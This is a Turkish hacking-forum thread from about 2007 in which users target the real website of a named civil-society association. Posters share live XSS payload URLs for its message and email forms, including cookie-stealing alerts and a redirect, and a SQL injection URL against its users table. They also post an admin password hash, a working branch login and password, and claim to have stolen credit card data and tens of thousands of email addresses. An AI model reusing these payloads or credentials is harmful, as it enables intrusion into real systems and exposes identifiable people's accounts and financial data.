Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
Çağdaş Yaşamı Destekleme Derneği XSS"Leri
Çağdaş Yaşamı Destekleme Derneği XSS"Leri
-
öncelikle çok büyük bir etki yaratabilecek xss açığı bulamadım. birkaç yerde açık var ama bu sitenin içeriğine erişim sağlamıyor. benim xss yiyen 2 tane açığım;
1 - Editöre mesaj gönderme konsolunda, bu editöre değil başka bi yere de gidebilir tabi
http://www.cydd.org.tr/mesaj.asp?kime=BartheZ&konu=Tahribat
2 - E-posta ekleme hücresinde. Yine burda html kodu çalıştırabiliyosunuz.
Birde şube giriş konsolları var ancak MySql Injection açığı yok. Bilmiyorum farklı açıklar bulup indirebilen çıkar mı
buyrun: http://www.cydd.org.tr/subegiris.asp
Türkan Saylan olayı.. Niye ÇYDD diye soran olursa..
-
helal sana hocam süpersin tam destek hep destek..
-
TebrikLer Eyw (:
-
BartheZ bunu yazdı:
-----------------------------öncelikle çok büyük bir etki yaratabilecek xss açığı bulamadım. birkaç yerde açık var ama bu sitenin içeriğine erişim sağlamıyor. benim xss yiyen 2 tane açığım;
1 - Editöre mesaj gönderme konsolunda, bu editöre değil başka bi yere de gidebilir tabi
http://www.cydd.org.tr/mesaj.asp?kime=BartheZ&konu=Tahribat
Türkan Saylan olayı.. Niye ÇYDD diye soran olursa..
-----------------------------
http://www.cydd.org.tr/default.asp?sayfa=forum Forumda kullanıcılar var onlara gidebilir :) Sitenin admini: editor :)http://www.cydd.org.tr/default.asp?sayfa=mesaj&kime=xxs&konu=xss
bLuetuLips<script></script><script>alert(document.cookie);</script><script>alert('Hmm XSS yiyiyo guzelce');</script><script>location.href('http://xssadresi/');</script>
alttaki gibi olmuyo :) ama editore yukardaki gibi yollanırsa kesin olur ehueheueh inş :)
http://www.cydd.org.tr/default.asp?sayfa=mesaj&kime=editor&konu=bLuetuLips<script></script><script>alert(document.cookie);</script><script>alert('Hmm XSS yiyiyo guzelce');</script><script>location.href('http://xssadresi/');</script>
-
Server Error in Forum Application
An error has occured while connecting to the database.
Please contact the forum administrator.Support Error Code:- err_Access_db_connection
File Name:- common.aspError details:-
Microsoft JET Database Engine
Could not find file 'd:\cydd-org-tr\cyddorgtr\Forum\CYDDForum.mdb'.Hocam az kaldı bu sitenin açığını buluyorum :D forumu sistemlerinden kaldırmışlar ama yakalıcam bi açıklarını
-
duyuru eklemeleri için elbette bi panelleri vardır veya şu şube olayı eğer aynı db deyse buyrun sql deneyin
http://www.cydd.org.tr/duyuru.asp?id=-1%20union+select+0,0+from+users+where+kullanici='admin'
-
gidin nakşibendi falan ipi sapı belli olmayan yasadışı tarikatların sitelerini hackleyin daha mahbuldür.
-
DecaMeroN bunu yazdı:
-----------------------------
gidin nakşibendi falan ipi sapı belli olmayan yasadışı tarikatların sitelerini hackleyin daha mahbuldür.-----------------------------
abü güzel diyosun da şunu belirteyim onlar beşiktaştada bi arkaadaş söylemişti onlar yüzyıllar önceden beri varızve olacağız hep diye içlerinde besledikleri içinde devamlı olacaktır eminim şu zamanda da benim tavsiyem pkk siteleri ilk başta
-
Çağdaş yaşamı destekleyen yasakçı bi vakıf bölee bişi olabilir mi? Türkan Saylana aşırı gıcık kapıyorum :D Bu sisteme girilse en az 100 subdomain var. pesimistzombie malesef sql açık yok. Adamlar her türlü önlemlerini almışlar bekliyolar forumlar kapalı ziyaretci dft. bilmemne herşeyleri kapalı :D
md5 :)mencoglu c21ec73ddef2f89bd07611386e5c333e -
Sitenin admin şifresinden kredi kartı bilgilerine..
33.000 kusur mail listesinden 100 kusur subdomaini,
Ve sube şifrelerini aldım :)
Bu arada bLuetuLips Eskisehir'in login şifresi o değil o kendi sitesine login olduğu şifre.
http://www.cydd.org.tr/subegiris.asp
Kullanıcı: eskisehir
Şifre: 6riyiju1
Bu arada bu accounttan en son login olan kullanıcı sisteme : 14 defa girmiş son girişi : 03.04.2007 22:57:02 :))
-
8mm bunu yazdı:
-----------------------------Sitenin admin şifresinden kredi kartı bilgilerine..
33.000 kusur mail listesinden 100 kusur subdomaini,
Ve sube şifrelerini aldım :)
Bu arada bLuetuLips Eskisehir'in login şifresi o değil o kendi sitesine login olduğu şifre.
http://www.cydd.org.tr/subegiris.asp
Kullanıcı: eskisehir
Şifre: 6riyiju1
Bu arada bu accounttan en son login olan kullanıcı sisteme : 14 defa girmiş son girişi : 03.04.2007 22:57:02 :))
-----------------------------Çok büyük bi haber olabilir :D Tv kanallarında filan :) Ben o kadar uğraştım amk. "Mdb"